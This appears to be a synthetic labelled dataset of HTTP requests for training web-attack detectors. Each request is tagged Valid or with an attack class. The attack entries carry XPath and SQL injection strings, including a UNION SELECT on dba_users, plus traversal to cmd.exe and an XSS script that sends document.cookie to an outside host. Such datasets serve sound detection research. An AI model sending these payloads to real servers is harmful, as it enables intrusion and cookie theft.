Accept-Encoding: deflate, gzip;q=0.5, identity;q=0.7, gzip;q=0.6, compress;q=0.3
Accept-Language: *
Cache-Control: max-age=563
Client-ip: 246.12.129.138
Cookie: iivRb-x.Kl1M=>;ckoneoteIued=098254516;ceaqfih=ee;nwc1H=ett42p;lguanA=epsSy;eh=0455
Cookie2: $Version="04"
Date: Tue, 26 Oct 04 15:00:11 UTC
ETag: "c_3ZqWuSkOGQHtONC"
Expect: 100-continue
From: I3hnmy@0fhsF.net
If-Modified-Since: Sat, 20 Feb 10 07:18:37 GMT
If-Unmodified-Since: Wed, 28 Apr 04 01:12:49 GMT
If-Match: "JZam0MIqP0m4Kkwv"
If-None-Match: "t1@SMJXjxPNzx8uh"
If-Range: "AP_hjRi0uzwrwLUNsZVD"
Max-Forwards: 72
MIME-Version: 3.3
Pragma: ea=ihrwno
Proxy-Authorization: NTLM ZG5lYW1sb25pb0s4cnJUdW5vVG5UdGlvc2V0dGFOdEZ6
Authorization: afna smasm=ri1Alfxm
Range: -742
Referer: /sweteion/arav/Oo8fA/rstfipl.swf
TE: deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/4.1 (X11; U; Linux i386 0.3; md-tm; rv:1.6.0) Gecko/53478837
UA-CPU: Sparc
UA-Disp: 5556,649,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 501x762
Via: 8.0 www.htuiee9.js, 6.4 www.rmTrxyn.tiff, HTTP/4.5 53.119.138.162
Transfer-Encoding: compress
Upgrade: wsRo6a/8.5
Warning: 659 11.248.81.124 "abilo" 
X-Forwarded-For: 182.133.25.200
X-Serial-Number: 21717
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12958
Start - Id: 49035
class: XPathInjection
GET /z55/woZ/pZoV0ap.T/rRtFYy5lJPD/wHn2FwY/r6QMscriptcg0CcZF1EU/x-hbENO0jVOIcznVPIH-.php?snEitabtuees=ecnodei+&ncmslinkB449.=%5B9h&ehesr0le=e_OOeXA_R&iWahtaccesRMHg0=stP+dme3+autoexece5Atvo&s4aasmlult=nsfe%27++or+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++++or+++%27y6knoen%27+++%3D%27&@tVYiA=0042&wp-nimg1-C7i=n3HqpiEj&bahh3tawst=wBarhyvbscriptl+Ni%25dtqat+n&Otea=utd7EgoTapsL&s8oZp1ieei=sHbLQlFn&eeeeo9o=akimscQJHUml&eotxaosys5uce=AfE&aku=aa HTTP/1.0
Host: www.7ogyer.st
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.7
Accept-Language: ok-tt3iic, l-ocna;q=0.6, zwhkehn-scs8Xohr;q=0.3, po-Yts;q=0.6, ylo1-awrdeywc
Cache-Control: max-age=7114
Client-ip: 176.183.31.155
Cookie: suo16n=6w;lehh=htr/&l\0d5R'2nc f;rsbdibdrn=cnoadhn;IkoclHn6=n;etfylenitsyfld0=mejgGAcyGZYw;e5GeoAi=691
Cookie2: $Version="246"
Date: Tue, 08 Dec 09 13:39:57 CET
ETag: "lvJg@fQtPGfZPSNn"
Expect: asneEri=oe6du;Oioao=uoxeyx
From: oc6etY@0uezaiml.cz
If-Modified-Since: Sun, 05 Jun 05 22:51:42 CET
If-Unmodified-Since: Sat, 01 Aug 09 24:58:17 UTC
If-Match: "sTKGR4P0AoW3qO_Opg"
If-None-Match: "5RjGOh8LcKVKM5_F1h6"
If-Range: Fri, 20 Feb 04 16:46:50 GMT
Max-Forwards: 895
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Basic MVRudG9zYjpnb2VzbmU=
Authorization: Digest realm
Range: -31
Referer: http://ss3o8eqN.biz/hfci/lgnoihf/ssepre7w.htm
TE: chunked
Trailer: Via
User-Agent: Mozilla/1.8 (X11; U; Unix 5.6; 0x-8t; rv:5.9.0) Gecko/46247922
UA-CPU: StrongARM
UA-Disp: 081,2723,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 1840x9062
Via: 0.8 www.4didh7.css
Transfer-Encoding: nsuaH; 3s9hHi=neitt
Upgrade: sfltc/9.5, Llja/5.6
Warning: 508 www.oxoelcbt.shtml "eseoaeasajz" 
X-Forwarded-For: 25.112.255.42
X-Serial-Number: 00114
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49035
Start - Id: 36702
class: OsCommanding
POST /sBrc@M18Ysq3cuQm/dauujamqrarpEs4red/2V4FS2niRdgADO8TYK.gif? HTTP/1.0
Content-Length: 213
Content-Language: ieri,enen,2i
Content-Encoding: compress
Content-Location: http://www.wtapYeN.org/watCl57/uneft/isct/ipenhnNs/lGnodnT.jsp
Content-MD5: MmFDNDZMZXRSZHMyYTB0aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 10 Apr 09 06:36:30 UTC
Last-Modified: Sun, 08 Nov 09 01:12:46 UTC
Host: www.3tedattny.biz:718
Connection: keep-alive
Accept: audio/*
Accept-Charset: *;q=0.9
Accept-Encoding: gzip;q=0.4, deflate, gzip;q=0.5, gzip, deflate
Accept-Language: enqbi67m-d2ezq, pbijatat-aruiA
Cache-Control: only-if-cached
Client-ip: 24.6.250.56
Cookie: its=2eiyaasF7oe;ncuO4ahqzLUz_=13395375;yYyic7enw=cSBIGAS.9_;yrekIaxae=mV3m9-
Cookie2: $Version="134"
Date: Thu, 22 Oct 09 20:17:07 GMT
ETag: W/"LE7CRa2rOJ_8Ht@xs8X"
Expect: 7oiToetn
From: debomi@hLAy.be
If-Modified-Since: Thu, 17 Apr 08 07:54:57 UTC
If-Unmodified-Since: Mon, 24 Sep 07 15:44:56 GMT
If-Match: "36xnzueWE8q@hfH.yFXT"
If-Range: Sat, 29 Oct 05 15:26:46 UTC
Max-Forwards: 38
MIME-Version: 8.5
Pragma: hnon5s=d4o
Proxy-Authorization: ssrr uentet=otetm
Authorization: Digest nonce
Range: 426198-
Referer: http://anasi4c.st/astso.js
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: bYwlNlw.Dj http://www.cn7t.org
UA-CPU: StrongARM
UA-Disp: 1584,454,32
UA-Color: color32
UA-Pixels: 654x545
Via: 6.2 www.sp2ynr.js, 5.2 www.iieees.html
Transfer-Encoding: deflate
Upgrade: ebhmu/0.2, e37zho/7.1
X-Forwarded-For: 123.125.191.125
X-Serial-Number: 56753790065108318
----: -------------------------

zrn2lnx9Acco=30131&locationAEXpositionKQ1passwdWH=ynwnttbhebeput&rles=nommod9hioZnxie&5X5q=an&ae3iIoctaev=Bcusrdpn7c&attxaenlfmAhtlr=734174&VY5WF=t(&eaeit=efiv&besuhbi=&id|&7dtq=4003692&hrdae=4006&iehhahsh=e

End - Id: 36702
Start - Id: 15552
class: Valid
GET /fIf.oGE/nprraizfaXlustDnldi/5boot.iniZtmprsock_streamopt/hgeat7mo/osohBnPx/iY.tiff? HTTP/1.0
Host: 187.28.18.11
Connection: ao8qnl7
Accept: text/xml;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-stale=14456
Client-ip: 227.212.204.1
Cookie: c8EKsam=00326;oytIasslyst=(:e;Enovtc=a&cis;unmaoUEre=45
Cookie2: $Version="420"
Date: Thu, 20 Mar 08 10:43:53 GMT
ETag: "Cqt5eE91-djhUSQE"
Expect: 100-continue
From: Ftobr@eibao.net
If-Modified-Since: Tue, 11 May 04 11:16:42 UTC
If-Unmodified-Since: Wed, 05 Dec 07 22:26:13 UTC
If-Match: "-wNuT8IdqRvdLq9"
If-None-Match: *
If-Range: *
Max-Forwards: 0693
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Hsumxd sali8=ohirmDyt
Authorization: Basic ZHRzdDpvdmhv
Range: 1-622060
Referer: /shka/zyyteaxi/7rtesdj/ataimaq.exe
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/8.7 (Windows; U; Win 9x 1.0; ul-st; rv:0.6.8) Gecko/21388547
UA-CPU: x86
UA-Disp: 8876,6331,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5730x198
Via: 4.6 www.vuuba3.css:9636, FTP/7.9 www.euhR.htm, 8.4 86.240.195.243:14045
Transfer-Encoding: identity
Upgrade: 2oio/9.9, zoEb/6.5, rBf/9.8, 1rfose/4.7, 4mlc/0.6
Warning: 995 www.oigsc.css "fWumtNl" "Sat, 03 Oct 09 14:38:14 UTC"
X-Forwarded-For: 144.153.36.75
X-Serial-Number: 4557726217620382027
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15552
Start - Id: 44077
class: OsCommanding
GET ..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.thev.net
Connection: seic
Accept: */*
Accept-Charset: x-mac-greek, windows-874;q=0.4, x-mac-roman;q=0.4
Accept-Encoding: 
Accept-Language: steTsrrv-aXnabqK
Cache-Control: only-if-cached
Client-ip: 103.148.81.42
Cookie: fZvkdNKW=dropbeet58ogecm0;Ustns85tehNNons=a6O.P_e;lceosrlqtoe5=a3autwwlIa7eb;aoi8n=568;ateeirth=LuDcibferZ0ce
Cookie2: $Version="25"
Date: Wed, 06 Jan 10 20:20:04 GMT
ETag: W/".Z.c4.xeA3kSTWv"
Expect: ohQd=nebl
From: eyde@enOee.biz
If-Modified-Since: Tue, 12 Jul 05 23:33:17 CET
If-Unmodified-Since: Tue, 05 Dec 06 11:35:44 GMT
If-Match: "4izoy@O-uWLf6iB"
If-None-Match: *
If-Range: "Bgk78tIdC6rpnZuB2R"
Max-Forwards: 1
MIME-Version: 3.4
Pragma: r=hsrr
Proxy-Authorization: elsyeo wweq2teU=ecoga5u
Authorization: Digest realm
Range: 70-
Referer: /hosjnq/EroeCdsa/6nseTtKn/o3tustr/loerr.php3
TE: trailers,trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/6.4 (Machintosh; U; PPC 9.4; xa-rb; rv:3.3.2) Gecko/96759090
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 4959x090
Via: 6.7 www.3x5m.html, peh/8.6 www.ytrtsbGZ.js, HTTP/3.6 30.37.47.72
Transfer-Encoding: teYne; nFrmtoRh=cananjo7
Upgrade: unHis2/9.7, sDw/8.7
Warning: 247 www.hxe31.png "9a02iegsdsel8esiecoC" 
X-Forwarded-For: 180.219.181.140
X-Serial-Number: 388289600968011
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44077
Start - Id: 27459
class: Valid
GET /wnalod/7i7/eIaO9ns/x6mhn/oEmfUlBxkX6/uYMnMJ/moylshrrem.gif?3tdler=6VF6Q.jw4iH&fottrtfereu=tetmelBsipc4Ss5id&Tvy4HX=njhguw1nnieTo&hI=rz-z&auhgS=eyxNEo8tcttd20o&Eiro1o2zses=eU6bO HTTP/1.1
Host: 39.182.166.105
Connection: keep-alive
Accept: video/*;q=0.4, image/jpeg;q=0.1
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: ta-f
Cache-Control: no-transform
Client-ip: 220.74.187.137
Cookie: cep4=fx;oet=i7dIorde;3ns9BgueH=ubinfwgetaccept;wp-@2435UwXQZ=s;tegpevndnh=167;wsgaegtsnon=tELWJZw@
Cookie2: $Version="504"
Date: Fri, 26 Feb 10 03:11:03 CET
ETag: "QtIOcNrTHUCZCQr"
Expect: or93asl=nmiehitp
From: lnoa@mkfNdbdI2t.de
If-Modified-Since: Fri, 27 Nov 09 09:50:10 CET
If-Unmodified-Since: Thu, 25 Nov 04 13:53:46 GMT
If-Match: *
If-None-Match: "vlt8.YalQQXV2Bz"
If-Range: Thu, 25 Mar 10 01:58:41 CET
Max-Forwards: 82
MIME-Version: 3.3
Pragma: syw=lebdaa0g
Proxy-Authorization: NTLM dXRlZHduZW51Z2NybUszdW5vYWJ0c25yYWF4eWFyb2U=
Authorization: Basic YTh1cnQ6MTNpZGFj
Range: -23882,10-10,-10053
Referer: /NyS6sLlc/atv6revh/emplMn.jpg
TE: trailers,trailers
Trailer: TE
User-Agent: hrih/3.6
UA-CPU: StrongARM
UA-Disp: 2797,148,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 802x162
Via: FTP/5.6 www.Dih1jc9.gif
Transfer-Encoding: nrilh
Upgrade: Srw8/3.1, wsbR/3.3, kiqo7/4.6, oilzes/0.4, abeat/7.3
Warning: 822 www.aJHeb.gif "Ee3Jmyqt1htasneg" 
X-Forwarded-For: 109.233.98.137
X-Serial-Number: 71071615969288398
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27459
Start - Id: 42681
class: SqlInjection
GET /enl/at/insertv23C8/3toehle/tloe2edurkksyLAz/76OlWhm.asmx?Lod=sfIT&tslFale7=a6iframe&Cs0eEssunh96lrt=627&link3TR9m=ghboir&ne4yyionbfad=Nsedoxtxtecbtbtn&taalws3Hicoh2=29673372&aT=or+0%3C%3E%28select++++count%28*%29+++from++tlBpttoe%29&obmA0zicSesev=5106160514&annT8s=0Cjli HTTP/1.1
Host: www.mrpaelgqn.ch
Connection: keep-alive
Accept: application/*;q=0.6
Accept-Charset: cp-950, x-mac-turkish
Accept-Encoding: 
Accept-Language: seprngop-dl2j9xtj;q=0.6
Cache-Control: max-stale=6
Client-ip: 219.244.18.221
Cookie: osaehgdRiRbb3hs=cfrlwapele0s7l;lJsssvio=waM;UNLDaFaX4=$etctN0t;GvISb=ekrnrfdmetateth;sx9uaetkl=z qrn1b9a|n';e7fromLcdy;cviclhy9a=719696850
Date: Mon, 04 Apr 05 21:21:11 GMT
ETag: "xm_kl@DG33VU5oJ"
Expect: 100-continue
From: keNoy@ouhsnitwek.de
If-Modified-Since: Sun, 18 Apr 10 09:38:13 UTC
If-Unmodified-Since: Thu, 25 Nov 04 21:11:09 GMT
If-Match: "Cgq-mthr4eBGYlXwdr"
If-None-Match: *
If-Range: *
Max-Forwards: 758
Pragma: aal1i=b7k4n
Proxy-Authorization: NTLM d295OG9zZjBvOHZpb2w0YWRvcmVpcTgyYXNubmFJaGFUZU5iZW8=
Authorization: Basic MkFnY3Jpb3M6cjlzcmE=
Range: 498-
Referer: /astm/d6lesr.msf
TE: chunked;q=0.2
User-Agent: Mozilla/5.1 (Windows; U; Win 9x 1.4; nn-Qe; rv:8.9.6) Gecko/66510046
UA-CPU: MIPS
UA-OS: WinNT
Transfer-Encoding: deflate
Upgrade: imz/3.7, oos/0.1
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42681
Start - Id: 47092
class: XSS
GET /BMHKgSorRDE2MHjh.pl?beujfhif=BsG%3CmIrn&N@Crlywgets=%3C%21--+--+--%3E%3Cscript++++%3E%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.chilelit.com%2Fcgi-bin%2Fllista.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+%3E%3C%21--+--+--%3E&nbhhqtdeeoesg=n5.q8KQZ HTTP/1.1
Host: 21.213.128.211:8162
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1252, iso-8859-3;q=0.0, euc-tw;q=0.6
Accept-Encoding: gzip, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 4.100.87.145
Cookie: aS7z9=r(oeaiametaR v?ueyid 
Cookie2: $Version="5"
Date: Sun, 26 Apr 09 12:36:54 GMT
ETag: W/"Eh_M290cofAT-FoHwEFf"
Expect: 100-continue
From: he45tlh@5ely.uk
If-Modified-Since: Wed, 16 Jun 04 06:03:19 CET
If-Unmodified-Since: Fri, 27 May 05 16:02:39 CET
If-Match: *
If-None-Match: "V9.i.iQXnMQ7R7p"
If-Range: Mon, 06 Nov 06 18:40:39 UTC
Max-Forwards: 8656
MIME-Version: 9.8
Pragma: hrb7E='6H0irea'
Proxy-Authorization: aos2 yryvu=gt6dn
Authorization: Basic YWVkZWYzOm5laGFldA==
Range: 8087-45811,698738-8731
Referer: /ewtlc/ideeaoBq/tkwh.jpeg
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: octeta2aox (aLDbnCks; iBwk-mmt; mrX8zMiZD; dJ1zIMZ5H)
UA-CPU: Sparc
UA-Disp: 016,6175,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 320x898
Via: HTTP/4.9 www.ioUbio.gif, 6obt/3.3 211.151.240.74
Transfer-Encoding: deflate
Upgrade: mwcnt/9.8, Dizwoq/2.8, rtnuoa/0.5
Warning: 897 220.57.2.222 "rztAtEb" "Sun, 09 Aug 09 20:51:13 CET"
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 60697232
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47092
Start - Id: 10745
class: Valid
GET /slFdvWh7vVx/na.@e/rhwa1li/shiiestahonMngcl/tAar7ma0euh3snhasf7t.asmx? HTTP/1.0
Host: 142.201.241.217
Connection: Oefhua
Accept: */*
Accept-Charset: windows-874;q=0.7, windows-1255;q=0.3
Accept-Encoding: 
Accept-Language: saeNaytd-elszee3e;q=0.1, w-xc;q=0.8, 8cemn5-net2nlx, nco-yaedoba
Cache-Control: min-fresh=474
Client-ip: 19.197.105.207
Cookie: witirnr=tfelsnsdrr
Cookie2: $Version="0"
Date: Sat, 20 May 06 08:46:32 CET
ETag: W/"@zp.Y_kJfTXtcAzBcxk"
Expect: Ep5o0uim=ejss8;earnl9
From: ytwosq@iohW8smt.uk
If-Modified-Since: Mon, 25 May 09 16:22:24 UTC
If-Unmodified-Since: Fri, 20 Feb 09 01:57:32 GMT
If-Match: *
If-None-Match: "uAQONd1UvgI_jFHP.-"
If-Range: *
Max-Forwards: 04
MIME-Version: 5.3
Pragma: o=di
Proxy-Authorization: Digest nonce
Authorization: Basic aHNuaXRlbmU6ZU9ocw==
Range: -44927,-01
Referer: /gzsce/dai1enzt/xeH4tB.tiff
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/3.2 (X11; U; Linux i586 7.9; Sd-bg; rv:8.8.5) Gecko/31113799
UA-CPU: Sparc
UA-Disp: 5895,841,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 713x311
Via: 4.6 www.siac.css, 2.8 192.122.4.96, 9.8 93.166.164.26
Transfer-Encoding: gzip
Upgrade: hermne/8.2, rtea/6.7, TesMw/7.3, sTw1mc/8.9, YMs/1.2
Warning: 670 www.saUy.png:0433 "vieoswphznnisiFSgo" "Thu, 08 Feb 07 08:53:44 UTC"
X-Forwarded-For: 39.67.73.35
X-Serial-Number: 12550417432743635
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10745
Start - Id: 42838
class: OsCommanding
GET /s7p/4oeen/rH7wUXSRr-3ra_l/2kiLEzM2fxjcf56L9f/AnodeDPI9rQPw/hetzdsWctf/nnnosfomvoien/RELexecLQgz.mdb?dtteteH1=%7Cdir++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C%2C HTTP/1.0
Host: 197.211.157.168:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: gzip, gzip, gzip;q=0.5, compress;q=0.7, gzip;q=0.8
Accept-Language: *;q=0.4
Cache-Control: max-age=871
Client-ip: 141.50.68.204
Cookie: rpselaPn=57373556
Date: Sun, 04 Apr 10 17:58:42 UTC
ETag: W/"ef0WQgxn5Q51Zfuc1"
Expect: 100-continue
From: otsveiea@oarDol.com
If-Modified-Since: Wed, 11 Mar 09 24:33:52 CET
If-Unmodified-Since: Sat, 24 Sep 05 20:33:19 CET
If-Match: "gENoWcr5j_zjOQ1c-Rd"
If-None-Match: "4@LlmSpFC.rqq1UWjc"
If-Range: *
Max-Forwards: 88
MIME-Version: 7.9
Pragma: gljue=Tsle
Authorization: 8w6nte apoS8=aisrnil5
Range: -885,-18051
Referer: http://www.es8mlo.be/eioeo/eegstn/SghbA/nw1iS.bin
TE: trailers,chunked
Trailer: Host
User-Agent: Mozilla/8.8 (X11; U; Unix 2.6; ee-ei; rv:2.3.2) Gecko/83256855
UA-CPU: StrongARM
UA-Disp: 1330,7116,16
UA-Color: color32
Via: 0.7 212.160.95.7:2087, FTP/1.3 229.192.98.243, 9.7 www.rn4b.html
Transfer-Encoding: identity
Upgrade: NhTeWO/2.9, teisee/0.9
Warning: 697 www.atUa.htm "itafi4b9c" 
X-Forwarded-For: 209.98.157.41
----: -------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 42838
Start - Id: 21187
class: Valid
GET /MY_.php4?retiaRithsrshez=28ebzbpjmE&stolbcbychgtt=v3%3Ev2wb1&eycxPdunaVgiiof=247781&4ftaaiddoj=u0dhr%3Eh+rjrsi%3E&T5.I=i3F&N-Q0sDB2adminK0cmd=hRlink%284&ptrlmehodtstO=sG%40JgPZ&cNFuEiCWpQinQ=%29fgltostufametaue&yeenonyoba0n=aDBJhdFHQ2&na4h=012&tobjectB5bm3window.open=1uKGGMKO HTTP/1.1
Host: www.1NombE.st
Connection: keep-alive
Accept: video/mpeg;q=0.0, text/*;q=0.1
Accept-Charset: us-ascii, euc-tw;q=0.2, euc-jp, iso-8859-3;q=0.9, x-mac-arabic
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: max-stale=6978
Client-ip: 201.72.152.249
Cookie: ieudttItt=oehbin;sloznnhusrn=j;GQR2yD=oOotyina9r ihcat;Kehcur4wsvw=eo(\ nrzro
Cookie2: $Version="06"
Date: Sat, 12 May 07 03:42:47 CET
ETag: W/"Sh1rWKHA9hHBbqXV@"
Expect: eCgea=etcnv;nHHl1c=trntA
From: aetfaus@nbciblTus.fr
If-Modified-Since: Sat, 29 Nov 08 15:49:19 UTC
If-Unmodified-Since: Tue, 02 Oct 07 21:47:24 UTC
If-Match: "VdWz6KpH8sgTZyx9b"
If-None-Match: *
If-Range: "jckmXD@yU9korAcid"
Max-Forwards: 36
MIME-Version: 3.3
Pragma: cl=demser
Proxy-Authorization: Digest realm
Authorization: Digest uri=http://tfc1ys.gov/snoo/iaetEu1/ntr8eT/turrled/sntcNrm.pl
Range: 85-737,54-2,-6
Referer: /uttu/sycvgnun.gif
TE: chunked;q=0.1
Trailer: Authorization
User-Agent: Mozilla/2.2 (Machintosh; U; Mac OS X 8.2; rm-dT; rv:3.6.6) Gecko/77622798
UA-CPU: PowerPC
UA-Disp: 158,905,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 402x543
Via: HTTP/1.8 www.sldht.tiff, 7.3 www.ebhlIsCC.html, FTP/3.8 www.izhaq.tiff:53916
Transfer-Encoding: identity
Upgrade: chbe/2.5, xmftad/6.6, onB/0.8, 0rtx/8.2, 3oDEvt/5.6
Warning: 287 www.ooron.jpg "eAsefYqn5etca1m" "Tue, 14 Dec 04 10:34:10 CET"
X-Forwarded-For: 105.99.66.229
X-Serial-Number: 041648335
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21187
Start - Id: 23446
class: Valid
GET /eBbxti_Yx.htm?oslitbafist=62941031&hwn4yowsndsa=4942&entcoisebd=90&Vrstst=768&hn2Ioxtht=530590&9proimidEalnll=Iperlozb&wdtongIsut=Aa%3Ae&OafInpr9usergd=2155295164&fe0ehbvihdtnal5=1839936&bo=763215091&at42djyTwo=e2Ezalink%2Br%3Dsi&script4PB=2hzAnoux8sorzWw HTTP/1.1
Host: 62.240.228.163
Connection: keep-alive
Accept: audio/*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: mmluwd-4bb02tee, ecpux-saTrah2i;q=0.9
Cache-Control: only-if-cached
Client-ip: 57.195.113.84
Cookie: tz6tidge7n7=leF5ZWcyQ;8p6wgetK.g1T=%dropet5ogl;ioin=eaow1htC
Cookie2: $Version="773"
Date: Thu, 14 May 09 09:53:27 GMT
ETag: W/"aqOu1yoJkDVVl12BQsul"
Expect: 100-continue
From: tocfie@tta6.cz
If-Modified-Since: Thu, 06 Jul 06 20:11:40 UTC
If-Unmodified-Since: Mon, 28 May 07 06:01:23 CET
If-Match: *
If-None-Match: "tdyOZ8sfLEjovP77yyf"
If-Range: Fri, 04 Feb 05 19:36:19 GMT
Max-Forwards: 049
MIME-Version: 3.9
Pragma: is6Cnca=s3aepw
Proxy-Authorization: Digest username="eru4bt"
Authorization: Basic aGNmaWk6aWZ1c3J0d2Q=
Range: 60-4,2-51827,267858-0573
Referer: http://Ultevl.gov/NSNphErm/Nsysi/A2deiete/dtedvoo/wsfvie.sh
TE: trailers
Trailer: Range
User-Agent: Mozilla/5.7 (compatible; MSIE 1.9; Open BSD i586; yceoa)
UA-CPU: StrongARM
UA-Disp: 2035,3360,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8587x9946
Via: HTTP/6.9 199.197.115.69, FTP/1.0 www.2eesd6i.css:745
Transfer-Encoding: gzip
Upgrade: umbaNi/0.8, Zb7fA/8.4
Warning: 271 www.yytteo.gif "tthisNt" 
X-Forwarded-For: 46.39.164.236
X-Serial-Number: 15233843
----: ------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 23446
Start - Id: 42441
class: SqlInjection
GET /E7ndejcnhfexe8tlnWo/H8PtexecTtK3zgYve/wq-.MuQ6B.TT-7AV/4n1QEaEgAcatk1dzIyj/8Fdm309/stttwsmghnnnyEg/uOSts42SlAVWC/owAWtGODJ_f/oi.nsf?mtethatu=C%3D%5Dss%24aaachildcgrlp&rnt3och2=ert&pfImCj=9t3%27+UNION++++%2F**%2F+++SELECT++tnem6Rrfa++++FROM+++++dba_users+++WHERE++ra++++like+++%27%2525&ga=uiyaoNlikee+WIc&dseSlpqe=ed HTTP/1.1
Host: www.ptoemmtlo.ch
Connection: keep-alive
Accept: application/*, video/mpeg, audio/basic;q=0.5
Accept-Charset: *
Accept-Encoding: deflate, compress;q=0.9, identity;q=0.2
Accept-Language: *
Cache-Control: 3e=5zOes
Client-ip: 138.240.240.225
Cookie: m6ooniseoa=lutdh0laeeoiMtaz;u4d=iewaza5ai7u6mu3;c0ben=swEOoygno3hlxnsS1e;srn1h0cahebramd=0MuzI;uhotpnfu=$a;zlobl=rFeeoTeXe
Cookie2: $Version="2"
Date: Wed, 28 Jan 09 07:08:46 CET
ETag: W/"OW_oBv4XGNtza5TpHP"
Expect: 100-continue
From: hraer@erUscu.ch
If-Modified-Since: Thu, 19 May 05 10:03:16 GMT
If-Unmodified-Since: Sun, 19 Apr 09 01:10:20 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 23 Apr 06 24:55:53 UTC
Max-Forwards: 9740
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic ZXllaVRoczY6bHNvM2k=
Range: -13
Referer: http://tddtb7s.com/0RIac/lhen/e6wp/epejxtbw.cfm
TE: chunked;q=0.5,gzip;q=0.5
Trailer: If-Unmodified-Since
User-Agent: im.WJ2cs http://www.oaGabaR.ch
UA-CPU: PowerPC
UA-Disp: 807,741,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 028x6235
Via: 1.7 www.io3p.jpg, eii3c/4.3 www.edx08.png, FTP/5.8 100.160.112.158
Transfer-Encoding: deflate
Upgrade: 5ues/5.0, s5cxlt/6.5
Warning: 804 3.116.103.108 "ltdxdrissdd" "Wed, 08 Nov 06 17:00:19 UTC"
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 2317427
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42441
Start - Id: 3839
class: Valid
GET /8gtx/eddvtmDei/o1Pecho-/nG/aQtVcheD065/lttSkaexo/ch54Y/Ccoeihst.pl?461jcov=dOh%3Eta2wgmtawsrDpassthrudt&sepn=5 HTTP/1.0
Host: www.arIkdtoef.gov
Connection: eos4rh
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: deflate;q=0.5
Accept-Language: *;q=0.5
Cache-Control: max-age=473
Client-ip: 52.234.215.56
Cookie: ntx6ptnmeacec23=n1vKXGT;orhacOswn=81;vm3uapni=cl
Cookie2: $Version="105"
Date: Fri, 24 Nov 06 04:01:10 UTC
ETag: W/"k@crpDCxITnNOA0"
From: ifdttds0@gliasula.fr
If-Modified-Since: Tue, 04 Apr 06 23:18:47 GMT
If-Unmodified-Since: Mon, 15 Aug 05 03:26:29 CET
If-Match: *
If-None-Match: "6@isSUXBxl5hBHc"
If-Range: Thu, 23 Mar 06 20:44:06 CET
Max-Forwards: 40
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: 7uitaa amaiIOci=oxusut
Referer: /1endruLm/etottsp/mrt1.exe
TE: chunked,trailers,trailers
User-Agent: Mozilla/3.1 (Windows; U; WinNT 7.2; gp-c5; rv:6.7.1) Gecko/49003220
UA-Color: color16
Via: 7.0 16.145.210.88, hzlw6c/9.5 www.saat7i2y.js, HTTP/7.6 58.47.233.132
Transfer-Encoding: gzip
Upgrade: eeyd/1.5, nTs9te/2.1, tdqnc/6.5
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3839
Start - Id: 16997
class: Valid
GET /b.0w-FwwypnyALUlk8Q/Zlog_system/bodyY/CWNtincludesvGP4H/ee.tiff?nf0tshwt=C7Sbsflatpvice HTTP/1.0
Host: 174.121.215.227
Connection: keep-alive
